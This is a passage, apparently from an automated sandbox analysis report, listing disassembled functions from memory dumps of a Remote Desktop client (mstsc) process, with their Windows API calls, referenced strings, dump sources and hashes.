                                                                                                                                                                                    • Instruction Fuzzy Hash: F821C87390122AABDB20AE65CC449EF77EDEF04714F1405A5FD0597150EB70AA84CBE1
                                                                                                                                                                                    Function 009642CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75encryptionCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CertFindExtension.CRYPT32(2.5.29.37,?,?), ref: 00964303
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 00964378
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CertExtensionFindFreeLocal
                                                                                                                                                                                    • String ID: 2.5.29.37
                                                                                                                                                                                    • API String ID: 2896064161-3842544949
                                                                                                                                                                                    • Opcode ID: edf16d1c93e5f5288bae73f7800ba9204378c5b49f6e1cc43e707c9d50aaea3f
                                                                                                                                                                                    • Instruction ID: 634008055c2d4e408c84a7f9afac96436c57a03bbdda8ebbca4312be224f1767
                                                                                                                                                                                    • Opcode Fuzzy Hash: edf16d1c93e5f5288bae73f7800ba9204378c5b49f6e1cc43e707c9d50aaea3f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3021DE76600224EFCB109FD4CD45EAEBBA9EF88760B118059F9458B361EB708D10DBA4
                                                                                                                                                                                    Function 0094A3CD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,0000000F,00000000,?), ref: 0094A45A
                                                                                                                                                                                      • Part of subcall function 0094A2F3: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?), ref: 0094A325
                                                                                                                                                                                      • Part of subcall function 0094A2F3: RegQueryValueExA.ADVAPI32 ref: 0094A366
                                                                                                                                                                                      • Part of subcall function 0094A2F3: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0094A385
                                                                                                                                                                                      • Part of subcall function 0094A2F3: RegCloseKey.ADVAPI32(?), ref: 0094A3AB
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,?), ref: 0094A413
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(hhctrl.ocx,?,?,00000000,?), ref: 0094A430
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                                                                                                                    • String ID: hhctrl.ocx$mstsc.chm
                                                                                                                                                                                    • API String ID: 1060647816-3096909771
                                                                                                                                                                                    • Opcode ID: 35cc59490074eab3f1aba83399d6b67badfb2bf7b8a587d3affb69fb2bdc9b3a
                                                                                                                                                                                    • Instruction ID: 532b94aeefe6a2e193a5211fa4448ad2cb80b937a59edc61bf15207261c5660a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 35cc59490074eab3f1aba83399d6b67badfb2bf7b8a587d3affb69fb2bdc9b3a
                                                                                                                                                                                    • Instruction Fuzzy Hash: FE118F71758205AFEB24DFA5EC19F7A73ECAB58704F00402DE852D66A0FBF49C40AB12
                                                                                                                                                                                    Function 00911040 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: Advapi32.dll$EventActivityIdControl
                                                                                                                                                                                    • API String ID: 4061214504-2884944642
                                                                                                                                                                                    • Opcode ID: ad97ca4ddc40af58ec529f4d1f149edc21e9ca6325e1d4a7e61c958efe1cf5ad
                                                                                                                                                                                    • Instruction ID: dbcc083eaab9b3fe279ad7b375d5f85513af55b0ad869c88de1ce414829ebb64
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad97ca4ddc40af58ec529f4d1f149edc21e9ca6325e1d4a7e61c958efe1cf5ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: A4F03131B5420DAFDB10DFE4DD16ABFB7B8EB98701F400068FA45E6190DA70AE459B52
                                                                                                                                                                                    Function 0091615E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(Ntdll.dll,?,?,009161DC), ref: 0091617B
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,009161DC), ref: 00916199
                                                                                                                                                                                    • GetProcAddress.KERNEL32(WinSqmAddToStream,?,?,009161DC), ref: 009161A6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                    • String ID: Ntdll.dll$WinSqmAddToStream
                                                                                                                                                                                    • API String ID: 145871493-93134304
                                                                                                                                                                                    • Opcode ID: fb29f5549188f827646c5883bb938c7867cd90428c319858693fbd19619fc7f7
                                                                                                                                                                                    • Instruction ID: 6824464bcc3b44798be1b157b55ec25b2fe150ea4e7f6aa3acadd3f98084d813
                                                                                                                                                                                    • Opcode Fuzzy Hash: fb29f5549188f827646c5883bb938c7867cd90428c319858693fbd19619fc7f7
                                                                                                                                                                                    • Instruction Fuzzy Hash: C5F06571B28222AF9B31477AAC1445775A9DFD1B61315407DF444D2235DFB0DC41EF92
                                                                                                                                                                                    Function 0093CA7F Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 210COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0093D3B6: SendDlgItemMessageW.USER32(?,00003344,000000F0,00000000,00000000,00000001,000000FC,00003AA2,0093CAC7,00000001,TscProxyLinkDelSavedCreds,000000FC), ref: 0093D3D4
                                                                                                                                                                                    • memset.MSVCRT ref: 0093CADF
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$AddressFreeHandleItemLibraryModuleProcSendTracememset
                                                                                                                                                                                    • String ID: GetEffectiveAuthMode failed!$O3$StringCchLength failed$TscProxyLinkDelSavedCreds
                                                                                                                                                                                    • API String ID: 3255493412-3188623267
                                                                                                                                                                                    • Opcode ID: c6de4d69da08b57f583b2588dbca8f4c3bb47ad3b68e09b79983070907508176
                                                                                                                                                                                    • Instruction ID: f0ca3cdb60b66f9fec349eca5d1a61178280a1bea82aade8c5e0cb1efa31e459
                                                                                                                                                                                    • Opcode Fuzzy Hash: c6de4d69da08b57f583b2588dbca8f4c3bb47ad3b68e09b79983070907508176
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0471D2B1A44718ABDB30DB68DC4DBAAB6B9AB48310F1004E9F509B72D1CB749E84CF45
                                                                                                                                                                                    Function 0093D1FE Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 137COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0093D231
                                                                                                                                                                                    • memset.MSVCRT ref: 0093D24B
                                                                                                                                                                                    • memset.MSVCRT ref: 0093D265
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • GetEffectiveServerName failed!, xrefs: 0093D2B2
                                                                                                                                                                                    • Failed to create temporary AA profile, xrefs: 0093D33D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: Failed to create temporary AA profile$GetEffectiveServerName failed!
                                                                                                                                                                                    • API String ID: 2883347319-1722353693
                                                                                                                                                                                    • Opcode ID: a40828c9555b8382e0b35643b02e9bfc192a89ee8c1b6ed0bd194156821f0837
                                                                                                                                                                                    • Instruction ID: 4ca39faf0df5fbdfa8a4585d08097dd83c2ff3b9f3ee69b54359d9bd272d10c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: a40828c9555b8382e0b35643b02e9bfc192a89ee8c1b6ed0bd194156821f0837
                                                                                                                                                                                    • Instruction Fuzzy Hash: B441B271A002086FDB25DF64DC99FAB77AEAFC8304F1004ADF40597251DA71ED958F51
                                                                                                                                                                                    Function 0096224C Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00962298
                                                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 009622B5
                                                                                                                                                                                    • CheckDlgButton.USER32(?,00003301,00000000), ref: 009622DD
                                                                                                                                                                                    • CheckDlgButton.USER32(?,00003301,00000001), ref: 00962303
                                                                                                                                                                                    • CheckDlgButton.USER32(?,000036C6,00000000), ref: 0096230F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ButtonCheck$EnableWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 9982438-0
                                                                                                                                                                                    • Opcode ID: 17f1dd75425cc83ee3d06ab6f943e0bb2d322e52689103029c5337ee5b5ce0f1
                                                                                                                                                                                    • Instruction ID: 96932145a65cdd2ebb0993130a7e24d86d4b1ae271c73576c37239a0c71ff9a3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 17f1dd75425cc83ee3d06ab6f943e0bb2d322e52689103029c5337ee5b5ce0f1
                                                                                                                                                                                    • Instruction Fuzzy Hash: D221D130A10516EFD718DF20CC94F3ABBA9FF48740F200569E916DB6A0DB71AD54DB80
                                                                                                                                                                                    Function 0093D0C8 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0093D0F7
                                                                                                                                                                                      • Part of subcall function 00958E3E: ??2@YAPAXI@Z.MSVCRT ref: 00958E50
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • GetEffectiveServerName failed!, xrefs: 0093D188
                                                                                                                                                                                    • TERMSRV, xrefs: 0093D1DC
                                                                                                                                                                                    • CTSCredManAssistant::CreateInstance failed!, xrefs: 0093D13C
                                                                                                                                                                                    • TscProxyLinkDelSavedCreds, xrefs: 0093D0DD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@AddressFreeHandleLibraryModuleProcmemset
                                                                                                                                                                                    • String ID: CTSCredManAssistant::CreateInstance failed!$GetEffectiveServerName failed!$TERMSRV$TscProxyLinkDelSavedCreds
                                                                                                                                                                                    • API String ID: 4238993307-2018271670
                                                                                                                                                                                    • Opcode ID: c4ca8f68f7f2069665aa57e0a76d84fb51e5fe47e2352ab2ecfc13bf2b77bfdd
                                                                                                                                                                                    • Instruction ID: a68e64799b43b9f661254cbdab456c1f91d183ba3315e61cea077e60359f48db
                                                                                                                                                                                    • Opcode Fuzzy Hash: c4ca8f68f7f2069665aa57e0a76d84fb51e5fe47e2352ab2ecfc13bf2b77bfdd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B310432608308AFEB29EF94DC59FAA77B9AB84304F04049DF90597091DA70ED94DF51
                                                                                                                                                                                    Function 0095BB29 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0095BB5D
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0095BB0F), ref: 0095BB79
                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0095BBB3
                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0095BBBB
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,0095BB0F), ref: 0095BBC8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$String$??3@CloseHandleLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 122121376-0
                                                                                                                                                                                    • Opcode ID: f0e45fa68fdb1f09123d153c44587e26b5c41763078337db0771498b5a8390c6
                                                                                                                                                                                    • Instruction ID: 7d9f41118f8e5d341c24fe0c9942d22e2d11ef6aa07898c381325ce4ce8bdcde
                                                                                                                                                                                    • Opcode Fuzzy Hash: f0e45fa68fdb1f09123d153c44587e26b5c41763078337db0771498b5a8390c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2311BB4601B02EFC718CF66D988A55FBE9FF08316754422DE85987A60CBB1E864DFC0
                                                                                                                                                                                    Function 00947AD0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • malloc.MSVCRT ref: 00947B2F
                                                                                                                                                                                    • free.MSVCRT ref: 00947B8F
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 00947BB6
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                      • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ActivityControlEventMessageTracefreemallocmemcpy
                                                                                                                                                                                    • String ID: alloc memory for m_PreAuthCookie$preAuthCookie
                                                                                                                                                                                    • API String ID: 3016499739-513349929
                                                                                                                                                                                    • Opcode ID: 5e9e30c1e3eaedc782bde92783bb3b1b5a3309ebd7bb3dd21231447d836470de
                                                                                                                                                                                    • Instruction ID: 1fd1fc40528d17277a413c5bf7b155497186e8062f3fd3e4d863cbc003fe1022
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e9e30c1e3eaedc782bde92783bb3b1b5a3309ebd7bb3dd21231447d836470de
                                                                                                                                                                                    • Instruction Fuzzy Hash: 67216B726083086FCB259F64DC46F57B79AEBC4324F140068F844971A2DB31CC55DBD1
                                                                                                                                                                                    Function 0093D9A1 Relevance: 7.6, APIs: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0093D9DD
                                                                                                                                                                                    • SendMessageW.USER32(?,00001127,00000000,0000F000), ref: 0093D9F6
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0093DA1E
                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0093DA57
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 0093DA68
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: 539358f75351a06175f98d8fb8fdf90ee3356ae3d99199e4a65c9c208768651a
                                                                                                                                                                                    • Instruction ID: eed0e219747974ed9afec21cd37efae9fbb91975da8d6b98d525d3c303a96ef4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 539358f75351a06175f98d8fb8fdf90ee3356ae3d99199e4a65c9c208768651a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6521A171E02225BBDB258A659D51BEDBBA8FF04760F014125FA05AB2C0D671DD50CBD4
                                                                                                                                                                                    Function 009370CA Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,0096A2E0), ref: 009370F6
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00937107
                                                                                                                                                                                    • MapWindowPoints.USER32 ref: 00937116
                                                                                                                                                                                    • OffsetRect.USER32 ref: 00937125
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000005), ref: 00937139
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ItemOffsetPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3327997973-0
                                                                                                                                                                                    • Opcode ID: 318854dfc9b2ec7406e8f7c0cbba0a67cab629ed337d6dd3359fb1ac05de46b8
                                                                                                                                                                                    • Instruction ID: 4f1c580d39a8282df9589bcfe158ee343942df8db19e83d268fd79b250efda15
                                                                                                                                                                                    • Opcode Fuzzy Hash: 318854dfc9b2ec7406e8f7c0cbba0a67cab629ed337d6dd3359fb1ac05de46b8
                                                                                                                                                                                    • Instruction Fuzzy Hash: AF1173B2608209AFDB119FE5DC45EBFBB7CEB49701F004429FA41D2150DB7099129FA1
                                                                                                                                                                                    Function 0095115C Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000003), ref: 0095118C
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0095119D
                                                                                                                                                                                    • MapWindowPoints.USER32 ref: 009511AE
                                                                                                                                                                                    • OffsetRect.USER32 ref: 009511BD
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000005,00000000,00000000,00000005), ref: 009511D1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ItemOffsetPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3327997973-0
                                                                                                                                                                                    • Opcode ID: 750887084bf9abf4c43b66a253c5c1646fed2094b1309f77d6571b48c5eee72a
                                                                                                                                                                                    • Instruction ID: 737e94bb90ff21ec0cc89b4df9991a158a33ef6c2b7417e550f92d0df1072d46
                                                                                                                                                                                    • Opcode Fuzzy Hash: 750887084bf9abf4c43b66a253c5c1646fed2094b1309f77d6571b48c5eee72a
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC112BB2608209AFDB01DFE5DD49FBFBBBCEB08301F104469FA41A2151CB70A915DBA1
                                                                                                                                                                                    Function 022C53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023022F4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 02302328
                                                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023022FC
                                                                                                                                                                                    • RTL: Resource at %p, xrefs: 0230230B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                                                    • Opcode ID: 4e791ec6e0493297603a4e1186a65d7e386e88ccd85e247b29290d41dd1c6f04
                                                                                                                                                                                    • Instruction ID: 9f25395b88fea72606a740f65d59d9861b716df1933d3e43feab33ee8812f540
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e791ec6e0493297603a4e1186a65d7e386e88ccd85e247b29290d41dd1c6f04
                                                                                                                                                                                    • Instruction Fuzzy Hash: 44510B716217016BEF21DBA4CC94FA7739DAF48324F214259FD05DF284EB61E841CBA0
                                                                                                                                                                                    Function 022CEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023024BD
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 023024FA
                                                                                                                                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0230248D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
